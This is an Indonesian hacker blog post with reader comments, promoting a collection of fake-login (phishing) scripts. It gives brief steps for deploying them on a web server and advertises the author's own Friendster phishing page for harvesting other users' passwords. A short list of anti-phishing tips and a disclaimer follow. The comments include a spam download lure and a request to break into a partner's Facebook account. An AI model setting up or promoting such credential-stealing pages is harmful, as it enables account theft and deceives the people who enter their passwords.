Jumat, 15 Mei 2009

Kumpulan script hack fake login

Ya yu ya, dah banyak yang tau kali ya apa itu fake login?

Buad yang gak tau gw jelasin secara umum aje ye.. Kzkzkz.. Byr pada ngerti loe semua, begini negh.

Fake Login: Login Palsu yang biasanya di gunain untuk mencuri, ngambil, log, password / identitas login seseorang.

Nah dari situ ada beberapa ni, yang gw dapet dari searching, mayan buad isengin orang.. Kzkzkz

Berikut ini kumpulannya om Darfun:


Wkwkwk.. Selengkapnya buka ajah web ownernya di:
http://darfun.50webs.com/darfun

Nah, sekarang? Gimana cara gunainnya ntuh script?

Hups, ini hasil editan gw sendiri loh ;P

1. Download dolo scriptnya / langsung di wget di servernya :)

2. Abis itu klo dah ke Upload tinggal di Extract. Misal: Extract di /home/gwe/public_html/aku

3. Abis itu cara jalaninnya.. http://www.sitenya.com/aku/

4. Selamat mencoba, good luck..

Ni, contoh fake login FS punya gwe sendiri yang baru.. Hehehe.. Gak make yang ono.. Silakan di cek di

http://friendster.utuhwibowo.com

Mayan buad dapetin password anakanak FS, jangan lupa pake direct link :)  * Ati ati, jangan sekali kali login dari sana, karena bisa saya lihat.. Wwkwkwkkw.. *Ntr saya ambil loh.. Kekekke… Kzkzkzkz.. xD

Oh ya, klo gak teu direct link, ask om google ya: “direct link” Hueheue..  Banyak kok..

Oh ya, ni skalian gw kasi tips supaya hati hati gak kna Fake Login:

1) Perhatikan dengan benar link address websitenya. Contoh klo FS linknya: http://www.friendster.com/login.php <- jadi pastikan linknya: www.friendster.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita kepada si Hacker.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang oleh para hacker. Kekekeke..

Ini cuma tutorial, segala tindak tanduk ya terserah anda.. Kzkzkzkz.. Sekian dari saya ;P

Klo mo bertanya silakan di #BINUSHACKER @ IRC.DAL.NET

Dedicated to All Member of BinusHacker Family
Loe² Semua Yang Dah Berkunjung Ke Web Ini.. :)
Sahabat sahabat gwe, doain Novel gwe selesai ya.. Kzkzkz

Terkait

Description: Kumpulan script hack fake login Rating: 4.5 Reviewer: Unknown ItemReviewed: Kumpulan script hack fake login
Al
Mbah Qopet Updated at: 09.14

11 komentar:

  1. bos kok link fsnya eror,,,waduh g bs coba nih,,bnerin dunk link script fsnya

    BalasHapus
  2. ok ...tak carikan lage...

    BalasHapus
  3. BaNGke RaWaLeTaN29 November 2009 07.16

    BLOG paan c ni?..
    muLut bau kijing..
    muka ky IBAB..
    baU TokAy Lg..
    hahahahahhahahahaha..


    Mav ya kLo kta2'a ksar..
    MinaL Aidin Wal Fa iDzin..

    BalasHapus
  4. boz... gak bisa kebuka semua linknya

    BalasHapus
  5. FACEBOOK FRIEND MESENGER26 Februari 2010 11.33

    GABUNG YUK TEMEN2 FACEBOOK DENGAN KOMUNITAS KAMI…KAMU BISA DAPETIN INFO2 TERBARU DI FACEBOOKMU..JG DENGAN MUDAH NEMUIN TEMEN2 LAMA KAMU..JUGA SECARA GAMPANG KAMU BISA DOWNLOAD GRATIS VIDEO2 & MP3 TERBARU,INFO LOWONGAN & BUTIK2 TERBARU DI SEKITARMU…

    KLIK & DOWNLOAD http://www.mediafire.com/?zjcug5zjngh

    AKU TUNGGU DI KOMUNITAS KAMI BANYAK TEMEN2 CEWEK MENUNGGU LOHHH….

    BalasHapus
  6. hahahaha...webnya uda di alihkan apa uda di hapus kalee yeee...STOP HACK anything on internet

    BalasHapus
  7. bos gmana si caranya bobol fb pacarq bles d alamat imail: obloboys@gmail.com

    BalasHapus
  8. situs ini mah macam pepek.sok pandai hack.g rasa loe sendiri kagak ngerti apa itu hack.malu maluin aja lagi.

    BalasHapus
  9. emang lo tau cara ngehack...

    ajarin gw...
    itu klo emang lo bisa...

    BalasHapus
  10. tinggal download aja bang

    BalasHapus
  11. Mr Rock Amateur10 Desember 2010 08.39

    Waduh bang gimana nih cara ngejalaninnya ??

    BalasHapus